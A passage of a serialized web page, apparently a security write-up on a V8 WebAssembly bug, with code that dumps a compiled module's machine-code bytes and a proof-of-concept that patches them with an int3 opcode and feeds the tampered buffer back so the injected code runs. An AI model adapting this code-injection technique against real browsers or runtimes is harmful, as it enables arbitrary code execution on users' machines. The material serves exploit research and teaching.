WebAssembly",{"type":24,"tag":301,"props":140472,"children":140473},{"style":359},[140474],{"type":30,"value":206},{"type":24,"tag":301,"props":140476,"children":140477},{"style":314},[140478],{"type":30,"value":92622},{"type":24,"tag":301,"props":140480,"children":140481},{"style":359},[140482],{"type":30,"value":362},{"type":24,"tag":301,"props":140484,"children":140485},{"style":369},[140486],{"type":30,"value":140487},"wasm_code",{"type":24,"tag":301,"props":140489,"children":140490},{"style":359},[140491],{"type":30,"value":589},{"type":24,"tag":301,"props":140493,"children":140494},{"class":303,"line":415},[140495,140499,140504,140508,140512,140516,140520,140525,140529,140534],{"type":24,"tag":301,"props":140496,"children":140497},{"style":348},[140498],{"type":30,"value":41795},{"type":24,"tag":301,"props":140500,"children":140501},{"style":369},[140502],{"type":30,"value":140503}," inst",{"type":24,"tag":301,"props":140505,"children":140506},{"style":385},[140507],{"type":30,"value":2537},{"type":24,"tag":301,"props":140509,"children":140510},{"style":348},[140511],{"type":30,"value":38685},{"type":24,"tag":301,"props":140513,"children":140514},{"style":369},[140515],{"type":30,"value":140470},{"type":24,"tag":301,"props":140517,"children":140518},{"style":359},[140519],{"type":30,"value":206},{"type":24,"tag":301,"props":140521,"children":140522},{"style":314},[140523],{"type":30,"value":140524},"Instance",{"type":24,"tag":301,"props":140526,"children":140527},{"style":359},[140528],{"type":30,"value":362},{"type":24,"tag":301,"props":140530,"children":140531},{"style":369},[140532],{"type":30,"value":140533},"mod",{"type":24,"tag":301,"props":140535,"children":140536},{"style":359},[140537],{"type":30,"value":589},{"type":24,"tag":301,"props":140539,"children":140540},{"class":303,"line":439},[140541,140545,140549,140553,140557,140561,140565,140569,140574],{"type":24,"tag":301,"props":140542,"children":140543},{"style":348},[140544],{"type":30,"value":41795},{"type":24,"tag":301,"props":140546,"children":140547},{"style":369},[140548],{"type":30,"value":86721},{"type":24,"tag":301,"props":140550,"children":140551},{"style":385},[140552],{"type":30,"value":2537},{"type":24,"tag":301,"props":140554,"children":140555},{"style":369},[140556],{"type":30,"value":140503},{"type":24,"tag":301,"props":140558,"children":140559},{"style":359},[140560],{"type":30,"value":206},{"type":24,"tag":301,"props":140562,"children":140563},{"style":369},[140564],{"type":30,"value":44625},{"type":24,"tag":301,"props":140566,"children":140567},{"style":359},[140568],{"type":30,"value":206},{"type":24,"tag":301,"props":140570,"children":140571},{"style":369},[140572],{"type":30,"value":140573},"shell",{"type":24,"tag":301,"props":140575,"children":140576},{"style":359},[140577],{"type":30,"value":492},{"type":24,"tag":301,"props":140579,"children":140580},{"class":303,"line":447},[140581],{"type":24,"tag":301,"props":140582,"children":140583},{"emptyLinePlaceholder":16},[140584],{"type":30,"value":341},{"type":24,"tag":301,"props":140586,"children":140587},{"class":303,"line":476},[140588,140592,140597,140601,140605],{"type":24,"tag":301,"props":140589,"children":140590},{"style":385},[140591],{"type":30,"value":63108},{"type":24,"tag":301,"props":140593,"children":140594},{"style":314},[140595],{"type":30,"value":140596},"WasmTierUpFunction",{"type":24,"tag":301,"props":140598,"children":140599},{"style":359},[140600],{"type":30,"value":362},{"type":24,"tag":301,"props":140602,"children":140603},{"style":369},[140604],{"type":30,"value":83013},{"type":24,"tag":301,"props":140606,"children":140607},{"style":359},[140608],{"type":30,"value":589},{"type":24,"tag":301,"props":140610,"children":140611},{"class":303,"line":495},[140612,140616,140621,140625,140630,140634,140638,140642],{"type":24,"tag":301,"props":140613,"children":140614},{"style":348},[140615],{"type":30,"value":41795},{"type":24,"tag":301,"props":140617,"children":140618},{"style":369},[140619],{"type":30,"value":140620}," serialized",{"type":24,"tag":301,"props":140622,"children":140623},{"style":385},[140624],{"type":30,"value":2537},{"type":24,"tag":301,"props":140626,"children":140627},{"style":385},[140628],{"type":30,"value":140629}," %",{"type":24,"tag":301,"props":140631,"children":140632},{"style":314},[140633],{"type":30,"value":139630},{"type":24,"tag":301,"props":140635,"children":140636},{"style":359},[140637],{"type":30,"value":362},{"type":24,"tag":301,"props":140639,"children":140640},{"style":369},[140641],{"type":30,"value":140533},{"type":24,"tag":301,"props":140643,"children":140644},{"style":359},[140645],{"type":30,"value":589},{"type":24,"tag":301,"props":140647,"children":140648},{"class":303,"line":504},[140649,140653,140657,140661,140665,140669,140673,140678],{"type":24,"tag":301,"props":140650,"children":140651},{"style":348},[140652],{"type":30,"value":3258},{"type":24,"tag":301,"props":140654,"children":140655},{"style":369},[140656],{"type":30,"value":15967},{"type":24,"tag":301,"props":140658,"children":140659},{"style":385},[140660],{"type":30,"value":2537},{"type":24,"tag":301,"props":140662,"children":140663},{"style":348},[140664],{"type":30,"value":38685},{"type":24,"tag":301,"props":140666,"children":140667},{"style":314},[140668],{"type":30,"value":140139},{"type":24,"tag":301,"props":140670,"children":140671},{"style":359},[140672],{"type":30,"value":362},{"type":24,"tag":301,"props":140674,"children":140675},{"style":369},[140676],{"type":30,"value":140677},"serialized",{"type":24,"tag":301,"props":140679,"children":140680},{"style":359},[140681],{"type":30,"value":589},{"type":24,"tag":301,"props":140683,"children":140684},{"class":303,"line":512},[140685,140690,140694,140698,140702,140707,140711,140715,140719,140724,140728,140733,140737,140741,140746],{"type":24,"tag":301,"props":140686,"children":140687},{"style":369},[140688],{"type":30,"value":140689},"console",{"type":24,"tag":301,"props":140691,"children":140692},{"style":359},[140693],{"type":30,"value":206},{"type":24,"tag":301,"props":140695,"children":140696},{"style":314},[140697],{"type":30,"value":108649},{"type":24,"tag":301,"props":140699,"children":140700},{"style":359},[140701],{"type":30,"value":362},{"type":24,"tag":301,"props":140703,"children":140704},{"style":329},[140705],{"type":30,"value":140706},"'['",{"type":24,"tag":301,"props":140708,"children":140709},{"style":385},[140710],{"type":30,"value":957},{"type":24,"tag":301,"props":140712,"children":140713},{"style":369},[140714],{"type":30,"value":15967},{"type":24,"tag":301,"props":140716,"children":140717},{"style":359},[140718],{"type":30,"value":206},{"type":24,"tag":301,"props":140720,"children":140721},{"style":314},[140722],{"type":30,"value":140723},"join",{"type":24,"tag":301,"props":140725,"children":140726},{"style":359},[140727],{"type":30,"value":362},{"type":24,"tag":301,"props":140729,"children":140730},{"style":329},[140731],{"type":30,"value":140732},"', '",{"type":24,"tag":301,"props":140734,"children":140735},{"style":359},[140736],{"type":30,"value":911},{"type":24,"tag":301,"props":140738,"children":140739},{"style":385},[140740],{"type":30,"value":11206},{"type":24,"tag":301,"props":140742,"children":140743},{"style":329},[140744],{"type":30,"value":140745}," ']'",{"type":24,"tag":301,"props":140747,"children":140748},{"style":359},[140749],{"type":30,"value":589},{"type":24,"tag":32,"props":140751,"children":140752},{},[140753],{"type":30,"value":140754},"This produces the following output:",{"type":24,"tag":291,"props":140756,"children":140758},{"code":140757},"[147, 6, 222, 192, 20, 119, 44, 43, 127, 62, 3, 0, 159, 206, 136, 43, 0, 0, 3, 0, 0, 0, 0, 0, 64, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 4, 28, 0, 0, 0, 16, 0, 0, 0, 28, 0, 0, 0, 28, 0, 0, 0, 28, 0, 0, 0, 4, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 64, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 2, 85, 72, 137, 229, 106, 8, 86, 72, 139, 229, 93, 195, 144, 15, 31, 0, 4, 0, 0, 0, 0, 0, 0, 0, 0, 4, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 64, 93, 198, 0]\n",[140759],{"type":24,"tag":145,"props":140760,"children":140761},{"__ignoreMap":7},[140762],{"type":30,"value":140757},{"type":24,"tag":32,"props":140764,"children":140765},{},[140766,140768,140774,140776,140782,140784,140790,140791,140797,140799,140804],{"type":30,"value":140767},"The bytes ",{"type":24,"tag":145,"props":140769,"children":140771},{"className":140770},[],[140772],{"type":30,"value":140773},"85, 72, 137, 229, ...",{"type":30,"value":140775}," correspond to the x86-64 function prologue (",{"type":24,"tag":145,"props":140777,"children":140779},{"className":140778},[],[140780],{"type":30,"value":140781},"push rbp; mov rbp, rsp",{"type":30,"value":140783},"). We replace the first byte with ",{"type":24,"tag":145,"props":140785,"children":140787},{"className":140786},[],[140788],{"type":30,"value":140789},"0xcc",{"type":30,"value":23246},{"type":24,"tag":145,"props":140792,"children":140794},{"className":140793},[],[140795],{"type":30,"value":140796},"int3",{"type":30,"value":140798}," opcode), and use this modified buffer as the serialized input to ",{"type":24,"tag":145,"props":140800,"children":140802},{"className":140801},[],[140803],{"type":30,"value":139604},{"type":30,"value":1679},{"type":24,"tag":291,"props":140806,"children":140808},{"code":140807,"language":3184,"meta":7,"className":3185,"style":7},"(async () => {\n const wasm_code = new Uint8Array([\n 0, 97, 115, 109, 1, 0, 0, 0, 1, 4, 1, 96, 0, 0, 3, 2, 1, 0, 7, 9, 1, 5, 115, 104, 101, 108, 108,\n 0, 0, 10, 4, 1, 2, 0, 11,\n ]);\n const buffer = new Uint8Array([\n 147, 6, 222, 192, 20, 119, 44, 43, 127, 62, 3, 0, 159, 206, 136, 43, 0, 0, 3, 0, 0, 0, 0, 0, 64,\n 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 4, 28, 0, 0, 0, 16, 0, 0, 0, 28, 0, 0, 0, 28, 0,\n 0, 0, 28, 0, 0, 0, 4, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 64, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,\n 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 2, 204, 72, 137, 229, 106, 8, 86, 72, 139, 229, 93,\n 195, 144, 15, 31, 0, 4, 0, 0, 0, 0, 0, 0, 0, 0, 4, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,\n 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 64, 93, 198, 0,\n ]);\n let r = bug(wasm_code, buffer.buffer);\n result = (await r.next()).value;\n const wasm_instance = new WebAssembly.Instance(result);\n const f = wasm_instance.exports.shell;\n f();\n})();\n",[140809],{"type":24,"tag":145,"props":140810,"children":140811},{"__ignoreMap":7},[140812,140835,140862,141082,141149,141157,141184,141398,141649,141900,142126,142370,142590,142597,142646,142691,142735,142774,142786],{"type":24,"tag":301,"props":140813,"children":140814},{"class":303,"line":304},[140815,140819,140823,140827,140831],{"type":24,"tag":301,"props":140816,"children":140817},{"style":359},[140818],{"type":30,"value":362},{"type":24,"tag":301,"props":140820,"children":140821},{"style":348},[140822],{"type":30,"value":4919},{"type":24,"tag":301,"props":140824,"children":140825},{"style":359},[140826],{"type":30,"value":46432},{"type":24,"tag":301,"props":140828,"children":140829},{"style":348},[140830],{"type":30,"value":4841},{"type":24,"tag":301,"props":140832,"children":140833},{"style":359},[140834],{"type":30,"value":3035},{"type":24,"tag":301,"props":140836,"children":140837},{"class":303,"line":320},[140838,140842,140846,140850,140854,140858],{"type":24,"tag":301,"props":140839,"children":140840},{"style":348},[140841],{"type":30,"value":42931},{"type":24,"tag":301,"props":140843,"children":140844},{"style":369},[140845],{"type":30,"value":140126},{"type":24,"tag":301,"props":140847,"children":140848},{"style":385},[140849],{"type":30,"value":2537},{"type":24,"tag":301,"props":140851,"children":140852},{"style":348},[140853],{"type":30,"value":38685},{"type":24,"tag":301,"props":140855,"children":140856},{"style":314},[140857],{"type":30,"value":140139},{"type":24,"tag":301,"props":140859,"children":140860},{"style":359},[140861],{"type":30,"value":140144},{"type":24,"tag":301,"props":140863,"children":140864},{"class":303,"line":335},[140865,140870,140874,140878,140882,140886,140890,140894,140898,140902,140906,140910,140914,140918,140922,140926,140930,140934,140938,140942,140946,140950,140954,140958,140962,140966,140970,140974,140978,140982,140986,140990,140994,140998,141002,141006,141010,141014,141018,141022,141026,141030,141034,141038,141042,141046,141050,141054,141058,141062,141066,141070,141074,141078],{"type":24,"tag":301,"props":140866,"children":140867},{"style":466},[140868],{"type":30,"value":140869}," 0",{"type":24,"tag":301,"props":140871,"children":140872},{"style":359},[140873],{"type":30,"value":377},{"type":24,"tag":301,"props":140875,"children":140876},{"style":466},[140877],{"type":30,"value":140161},{"type":24,"tag":301,"props":140879,"children":140880},{"style":359},[140881],{"type":30,"value":377},{"type":24,"tag":301,"props":140883,"children":140884},{"style":466},[140885],{"type":30,"value":140170},{"type":24,"tag":301,"props":140887,"children":140888},{"style":359},[140889],{"type":30,"value":377},{"type":24,"tag":301,"props":140891,"children":140892},{"style":466},[140893],{"type":30,"value":140179},{"type":24,"tag":301,"props":140895,"children":140896},{"style":359},[140897],{"type":30,"value":377},{"type":24,"tag":301,"props":140899,"children":140900},{"style":466},[140901],{"type":30,"value":546},{"type":24,"tag":301,"props":140903,"children":140904},{"style":359},[140905],{"type":30,"value":377},{"type":24,"tag":301,"props":140907,"children":140908},{"style":466},[140909],{"type":30,"value":584},{"type":24,"tag":301,"props":140911,"children":140912},{"style":359},[140913],{"type":30,"value":377},{"type":24,"tag":301,"props":140915,"children":140916},{"style":466},[140917],{"type":30,"value":584},{"type":24,"tag":301,"props":140919,"children":140920},{"style":359},[140921],{"type":30,"value":377},{"type":24,"tag":301,"props":140923,"children":140924},{"style":466},[140925],{"type":30,"value":584},{"type":24,"tag":301,"props":140927,"children":140928},{"style":359},[140929],{"type":30,"value":377},{"type":24,"tag":301,"props":140931,"children":140932},{"style":466},[140933],{"type":30,"value":546},{"type":24,"tag":301,"props":140935,"children":140936},{"style":359},[140937],{"type":30,"value":377},{"type":24,"tag":301,"props":140939,"children":140940},{"style":466},[140941],{"type":30,"value":1761},{"type":24,"tag":301,"props":140943,"children":140944},{"style":359},[140945],{"type":30,"value":377},{"type":24,"tag":301,"props":140947,"children":140948},{"style":466},[140949],{"type":30,"value":546},{"type":24,"tag":301,"props":140951,"children":140952},{"style":359},[140953],{"type":30,"value":377},{"type":24,"tag":301,"props":140955,"children":140956},{"style":466},[140957],{"type":30,"value":140244},{"type":24,"tag":301,"props":140959,"children":140960},{"style":359},[140961],{"type":30,"value":377},{"type":24,"tag":301,"props":140963,"children":140964},{"style":466},[140965],{"type":30,"value":584},{"type":24,"tag":301,"props":140967,"children":140968},{"style":359},[140969],{"type":30,"value":377},{"type":24,"tag":301,"props":140971,"children":140972},{"style":466},[140973],{"type":30,"value":584},{"type":24,"tag":301,"props":140975,"children":140976},{"style":359},[140977],{"type":30,"value":377},{"type":24,"tag":301,"props":140979,"children":140980},{"style":466},[140981],{"type":30,"value":1447},{"type":24,"tag":301,"props":140983,"children":140984},{"style":359},[140985],{"type":30,"value":377},{"type":24,"tag":301,"props":140987,"children":140988},{"style":466},[140989],{"type":30,"value":1503},{"type":24,"tag":301,"props":140991,"children":140992},{"style":359},[140993],{"type":30,"value":377},{"type":24,"tag":301,"props":140995,"children":140996},{"style":466},[140997],{"type":30,"value":546},{"type":24,"tag":301,"props":140999,"children":141000},{"style":359},[141001],{"type":30,"value":377},{"type":24,"tag":301,"props":141003,"children":141004},{"style":466},[141005],{"type":30,"value":584},{"type":24,"tag":301,"props":141007,"children":141008},{"style":359},[141009],{"type":30,"value":377},{"type":24,"tag":301,"props":141011,"children":141012},{"style":466},[141013],{"type":30,"value":61393},{"type":24,"tag":301,"props":141015,"children":141016},{"style":359},[141017],{"type":30,"value":377},{"type":24,"tag":301,"props":141019,"children":141020},{"style":466},[141021],{"type":30,"value":62606},{"type":24,"tag":301,"props":141023,"children":141024},{"style":359},[141025],{"type":30,"value":377},{"type":24,"tag":301,"props":141027,"children":141028},{"style":466},[141029],{"type":30,"value":546},{"type":24,"tag":301,"props":141031,"children":141032},{"style":359},[141033],{"type":30,"value":377},{"type":24,"tag":301,"props":141035,"children":141036},{"style":466},[141037],{"type":30,"value":24886},{"type":24,"tag":301,"props":141039,"children":141040},{"style":359},[141041],{"type":30,"value":377},{"type":24,"tag":301,"props":141043,"children":141044},{"style":466},[141045],{"type":30,"value":140170},{"type":24,"tag":301,"props":141047,"children":141048},{"style":359},[141049],{"type":30,"value":377},{"type":24,"tag":301,"props":141051,"children":141052},{"style":466},[141053],{"type":30,"value":140341},{"type":24,"tag":301,"props":141055,"children":141056},{"style":359},[141057],{"type":30,"value":377},{"type":24,"tag":301,"props":141059,"children":141060},{"style":466},[141061],{"type":30,"value":140350},{"type":24,"tag":301,"props":141063,"children":141064},{"style":359},[141065],{"type":30,"value":377},{"type":24,"tag":301,"props":141067,"children":141068},{"style":466},[141069],{"type":30,"value":140359},{"type":24,"tag":301,"props":141071,"children":141072},{"style":359},[141073],{"type":30,"value":377},{"type":24,"tag":301,"props":141075,"children":141076},{"style":466},[141077],{"type":30,"value":140359},{"type":24,"tag":301,"props":141079,"children":141080},{"style":359},[141081],{"type":30,"value":1729},{"type":24,"tag":301,"props":141083,"children":141084},{"class":303,"line":344},[141085,141089,141093,141097,141101,141105,141109,141113,141117,141121,141125,141129,141133,141137,141141,141145],{"type":24,"tag":301,"props":141086,"children":141087},{"style":466},[141088],{"type":30,"value":140869},{"type":24,"tag":301,"props":141090,"children":141091},{"style":359},[141092],{"type":30,"value":377},{"type":24,"tag":301,"props":141094,"children":141095},{"style":466},[141096],{"type":30,"value":584},{"type":24,"tag":301,"props":141098,"children":141099},{"style":359},[141100],{"type":30,"value":377},{"type":24,"tag":301,"props":141102,"children":141103},{"style":466},[141104],{"type":30,"value":9505},{"type":24,"tag":301,"props":141106,"children":141107},{"style":359},[141108],{"type":30,"value":377},{"type":24,"tag":301,"props":141110,"children":141111},{"style":466},[141112],{"type":30,"value":1761},{"type":24,"tag":301,"props":141114,"children":141115},{"style":359},[141116],{"type":30,"value":377},{"type":24,"tag":301,"props":141118,"children":141119},{"style":466},[141120],{"type":30,"value":546},{"type":24,"tag":301,"props":141122,"children":141123},{"style":359},[141124],{"type":30,"value":377},{"type":24,"tag":301,"props":141126,"children":141127},{"style":466},[141128],{"type":30,"value":1503},{"type":24,"tag":301,"props":141130,"children":141131},{"style":359},[141132],{"type":30,"value":377},{"type":24,"tag":301,"props":141134,"children":141135},{"style":466},[141136],{"type":30,"value":584},{"type":24,"tag":301,"props":141138,"children":141139},{"style":359},[141140],{"type":30,"value":377},{"type":24,"tag":301,"props":141142,"children":141143},{"style":466},[141144],{"type":30,"value":140435},{"type":24,"tag":301,"props":141146,"children":141147},{"style":359},[141148],{"type":30,"value":1729},{"type":24,"tag":301,"props":141150,"children":141151},{"class":303,"line":401},[141152],{"type":24,"tag":301,"props":141153,"children":141154},{"style":359},[141155],{"type":30,"value":141156}," ]);\n",{"type":24,"tag":301,"props":141158,"children":141159},{"class":303,"line":415},[141160,141164,141168,141172,141176,141180],{"type":24,"tag":301,"props":141161,"children":141162},{"style":348},[141163],{"type":30,"value":42931},{"type":24,"tag":301,"props":141165,"children":141166},{"style":369},[141167],{"type":30,"value":131953},{"type":24,"tag":301,"props":141169,"children":141170},{"style":385},[141171],{"type":30,"value":2537},{"type":24,"tag":301,"props":141173,"children":141174},{"style":348},[141175],{"type":30,"value":38685},{"type":24,"tag":301,"props":141177,"children":141178},{"style":314},[141179],{"type":30,"value":140139},{"type":24,"tag":301,"props":141181,"children":141182},{"style":359},[141183],{"type":30,"value":140144},{"type":24,"tag":301,"props":141185,"children":141186},{"class":303,"line":439},[141187,141192,141196,141200,141204,141209,141213,141218,141222,141227,141231,141236,141240,141245,141249,141254,141258,141263,141267,141272,141276,141280,141284,141288,141292,141297,141301,141306,141310,141314,141318,141322,141326,141330,141334,141338,141342,141346,141350,141354,141358,141362,141366,141370,141374,141378,141382,141386,141390,141394],{"type":24,"tag":301,"props":141188,"children":141189},{"style":466},[141190],{"type":30,"value":141191}," 147",{"type":24,"tag":301,"props":141193,"children":141194},{"style":359},[141195],{"type":30,"value":377},{"type":24,"tag":301,"props":141197,"children":141198},{"style":466},[141199],{"type":30,"value":25198},{"type":24,"tag":301,"props":141201,"children":141202},{"style":359},[141203],{"type":30,"value":377},{"type":24,"tag":301,"props":141205,"children":141206},{"style":466},[141207],{"type":30,"value":141208},"222",{"type":24,"tag":301,"props":141210,"children":141211},{"style":359},[141212],{"type":30,"value":377},{"type":24,"tag":301,"props":141214,"children":141215},{"style":466},[141216],{"type":30,"value":141217},"192",{"type":24,"tag":301,"props":141219,"children":141220},{"style":359},[141221],{"type":30,"value":377},{"type":24,"tag":301,"props":141223,"children":141224},{"style":466},[141225],{"type":30,"value":141226},"20",{"type":24,"tag":301,"props":141228,"children":141229},{"style":359},[141230],{"type":30,"value":377},{"type":24,"tag":301,"props":141232,"children":141233},{"style":466},[141234],{"type":30,"value":141235},"119",{"type":24,"tag":301,"props":141237,"children":141238},{"style":359},[141239],{"type":30,"value":377},{"type":24,"tag":301,"props":141241,"children":141242},{"style":466},[141243],{"type":30,"value":141244},"44",{"type":24,"tag":301,"props":141246,"children":141247},{"style":359},[141248],{"type":30,"value":377},{"type":24,"tag":301,"props":141250,"children":141251},{"style":466},[141252],{"type":30,"value":141253},"43",{"type":24,"tag":301,"props":141255,"children":141256},{"style":359},[141257],{"type":30,"value":377},{"type":24,"tag":301,"props":141259,"children":141260},{"style":466},[141261],{"type":30,"value":141262},"127",{"type":24,"tag":301,"props":141264,"children":141265},{"style":359},[141266],{"type":30,"value":377},{"type":24,"tag":301,"props":141268,"children":141269},{"style":466},[141270],{"type":30,"value":141271},"62",{"type":24,"tag":301,"props":141273,"children":141274},{"style":359},[141275],{"type":30,"value":377},{"type":24,"tag":301,"props":141277,"children":141278},{"style":466},[141279],{"type":30,"value":1447},{"type":24,"tag":301,"props":141281,"children":141282},{"style":359},[141283],{"type":30,"value":377},{"type":24,"tag":301,"props":141285,"children":141286},{"style":466},[141287],{"type":30,"value":584},{"type":24,"tag":301,"props":141289,"children":141290},{"style":359},[141291],{"type":30,"value":377},{"type":24,"tag":301,"props":141293,"children":141294},{"style":466},[141295],{"type":30,"value":141296},"159",{"type":24,"tag":301,"props":141298,"children":141299},{"style":359},[141300],{"type":30,"value":377},{"type":24,"tag":301,"props":141302,"children":141303},{"style":466},[141304],{"type":30,"value":141305},"206",{"type":24,"tag":301,"props":141307,"children":141308},{"style":359},[141309],{"type":30,"value":377},{"type":24,"tag":301,"props":141311,"children":141312},{"style":466},[141313],{"type":30,"value":50886},{"type":24,"tag":301,"props":141315,"children":141316},{"style":359},[141317],{"type":30,"value":377},{"type":24,"tag":301,"props":141319,"children":141320},{"style":466},[141321],{"type":30,"value":141253},{"type":24,"tag":301,"props":141323,"children":141324},{"style":359},[141325],{"type":30,"value":377},{"type":24,"tag":301,"props":141327,"children":141328},{"style":466},[141329],{"type":30,"value":584},{"type":24,"tag":301,"props":141331,"children":141332},{"style":359},[141333],{"type":30,"value":377},{"type":24,"tag":301,"props":141335,"children":141336},{"style":466},[141337],{"type":30,"value":584},{"type":24,"tag":301,"props":141339,"children":141340},{"style":359},[141341],{"type":30,"value":377},{"type":24,"tag":301,"props":141343,"children":141344},{"style":466},[141345],{"type":30,"value":1447},{"type":24,"tag":301,"props":141347,"children":141348},{"style":359},[141349],{"type":30,"value":377},{"type":24,"tag":301,"props":141351,"children":141352},{"style":466},[141353],{"type":30,"value":584},{"type":24,"tag":301,"props":141355,"children":141356},{"style":359},[141357],{"type":30,"value":377},{"type":24,"tag":301,"props":141359,"children":141360},{"style":466},[141361],{"type":30,"value":584},{"type":24,"tag":301,"props":141363,"children":141364},{"style":359},[141365],{"type":30,"value":377},{"type":24,"tag":301,"props":141367,"children":141368},{"style":466},[141369],{"type":30,"value":584},{"type":24,"tag":301,"props":141371,"children":141372},{"style":359},[141373],{"type":30,"value":377},{"type":24,"tag":301,"props":141375,"children":141376},{"style":466},[141377],{"type":30,"value":584},{"type":24,"tag":301,"props":141379,"children":141380},{"style":359},[141381],{"type":30,"value":377},{"type":24,"tag":301,"props":141383,"children":141384},{"style":466},[141385],{"type":30,"value":584},{"type":24,"tag":301,"props":141387,"children":141388},{"style":359},[141389],{"type":30,"value":377},{"type":24,"tag":301,"props":141391,"children":141392},{"style":466},[141393],{"type":30,"value":36179},{"type":24,"tag":301,"props":141395,"children":141396},{"style":359},[141397],{"type":30,"value":1729},{"type":24,"tag":301,"props":141399,"children":141400},{"class":303,"line":447},[141401,141405,141409,141413,141417,141421,141425,141429,141433,141437,141441,141445,141449,141453,141457,141461,141465,141469,141473,141477,141481,141485,141489,141493,141497,141501,141505,141509,141513,141517,141521,141525,141529,141533,141537,141541,141545,141549,141553,141557,141561,141565,141569,141573,141577,141581,141585,141589,141593,141597,141601,141605,141609,141613,141617,141621,141625,141629,141633,141637,141641,141645],{"type":24,"tag":301,"props":141402,"children":141403},{"style":466},[141404],{"type":30,"value":140869},{"type":24,"tag":301,"props":141406,"children":141407},{"style":359},[141408],{"type":30,"value":377},{"type":24,"tag":301,"props":141410,"children":141411},{"style":466},[141412],{"type":30,"value":584},{"type":24,"tag":301,"props":141414,"children":141415},{"style":359},[141416],{"type":30,"value":377},{"type":24,"tag":301,"props":141418,"children":141419},{"style":466},[141420],{"type":30,"value":584},{"type":24,"tag":301,"props":141422,"children":141423},{"style":359},[141424],{"type":30,"value":377},{"type":24,"tag":301,"props":141426,"children":141427},{"style":466},[141428],{"type":30,"value":584},{"type":24,"tag":301,"props":141430,"children":141431},{"style":359},[141432],{"type":30,"value":377},{"type":24,"tag":301,"props":141434,"children":141435},{"style":466},[141436],{"type":30,"value":584},{"type":24,"tag":301,"props":141438,"children":141439},{"style":359},[141440],{"type":30,"value":377},{"type":24,"tag":301,"props":141442,"children":141443},{"style":466},[141444],{"type":30,"value":584},{"type":24,"tag":301,"props":141446,"children":141447},{"style":359},[141448],{"type":30,"value":377},{"type":24,"tag":301,"props":141450,"children":141451},{"style":466},[141452],{"type":30,"value":584},{"type":24,"tag":301,"props":141454,"children":141455},{"style":359},[141456],{"type":30,"value":377},{"type":24,"tag":301,"props":141458,"children":141459},{"style":466},[141460],{"type":30,"value":546},{"type":24,"tag":301,"props":141462,"children":141463},{"style":359},[141464],{"type":30,"value":377},{"type":24,"tag":301,"props":141466,"children":141467},{"style":466},[141468],{"type":30,"value":584},{"type":24,"tag":301,"props":141470,"children":141471},{"style":359},[141472],{"type":30,"value":377},{"type":24,"tag":301,"props":141474,"children":141475},{"style":466},[141476],{"type":30,"value":584},{"type":24,"tag":301,"props":141478,"children":141479},{"style":359},[141480],{"type":30,"value":377},{"type":24,"tag":301,"props":141482,"children":141483},{"style":466},[141484],{"type":30,"value":584},{"type":24,"tag":301,"props":141486,"children":141487},{"style":359},[141488],{"type":30,"value":377},{"type":24,"tag":301,"props":141490,"children":141491},{"style":466},[141492],{"type":30,"value":584},{"type":24,"tag":301,"props":141494,"children":141495},{"style":359},[141496],{"type":30,"value":377},{"type":24,"tag":301,"props":141498,"children":141499},{"style":466},[141500],{"type":30,"value":584},{"type":24,"tag":301,"props":141502,"children":141503},{"style":359},[141504],{"type":30,"value":377},{"type":24,"tag":301,"props":141506,"children":141507},{"style":466},[141508],{"type":30,"value":584},{"type":24,"tag":301,"props":141510,"children":141511},{"style":359},[141512],{"type":30,"value":377},{"type":24,"tag":301,"props":141514,"children":141515},{"style":466},[141516],{"type":30,"value":584},{"type":24,"tag":301,"props":141518,"children":141519},{"style":359},[141520],{"type":30,"value":377},{"type":24,"tag":301,"props":141522,"children":141523},{"style":466},[141524],{"type":30,"value":584},{"type":24,"tag":301,"props":141526,"children":141527},{"style":359},[141528],{"type":30,"value":377},{"type":24,"tag":301,"props":141530,"children":141531},{"style":466},[141532],{"type":30,"value":1761},{"type":24,"tag":301,"props":141534,"children":141535},{"style":359},[141536],{"type":30,"value":377},{"type":24,"tag":301,"props":141538,"children":141539},{"style":466},[141540],{"type":30,"value":9263},{"type":24,"tag":301,"props":141542,"children":141543},{"style":359},[141544],{"type":30,"value":377},{"type":24,"tag":301,"props":141546,"children":141547},{"style":466},[141548],{"type":30,"value":584},{"type":24,"tag":301,"props":141550,"children":141551},{"style":359},[141552],{"type":30,"value":377},{"type":24,"tag":301,"props":141554,"children":141555},{"style":466},[141556],{"type":30,"value":584},{"type":24,"tag":301,"props":141558,"children":141559},{"style":359},[141560],{"type":30,"value":377},{"type":24,"tag":301,"props":141562,"children":141563},{"style":466},[141564],{"type":30,"value":584},{"type":24,"tag":301,"props":141566,"children":141567},{"style":359},[141568],{"type":30,"value":377},{"type":24,"tag":301,"props":141570,"children":141571},{"style":466},[141572],{"type":30,"value":3073},{"type":24,"tag":301,"props":141574,"children":141575},{"style":359},[141576],{"type":30,"value":377},{"type":24,"tag":301,"props":141578,"children":141579},{"style":466},[141580],{"type":30,"value":584},{"type":24,"tag":301,"props":141582,"children":141583},{"style":359},[141584],{"type":30,"value":377},{"type":24,"tag":301,"props":141586,"children":141587},{"style":466},[141588],{"type":30,"value":584},{"type":24,"tag":301,"props":141590,"children":141591},{"style":359},[141592],{"type":30,"value":377},{"type":24,"tag":301,"props":141594,"children":141595},{"style":466},[141596],{"type":30,"value":584},{"type":24,"tag":301,"props":141598,"children":141599},{"style":359},[141600],{"type":30,"value":377},{"type":24,"tag":301,"props":141602,"children":141603},{"style":466},[141604],{"type":30,"value":9263},{"type":24,"tag":301,"props":141606,"children":141607},{"style":359},[141608],{"type":30,"value":377},{"type":24,"tag":301,"props":141610,"children":141611},{"style":466},[141612],{"type":30,"value":584},{"type":24,"tag":301,"props":141614,"children":141615},{"style":359},[141616],{"type":30,"value":377},{"type":24,"tag":301,"props":141618,"children":141619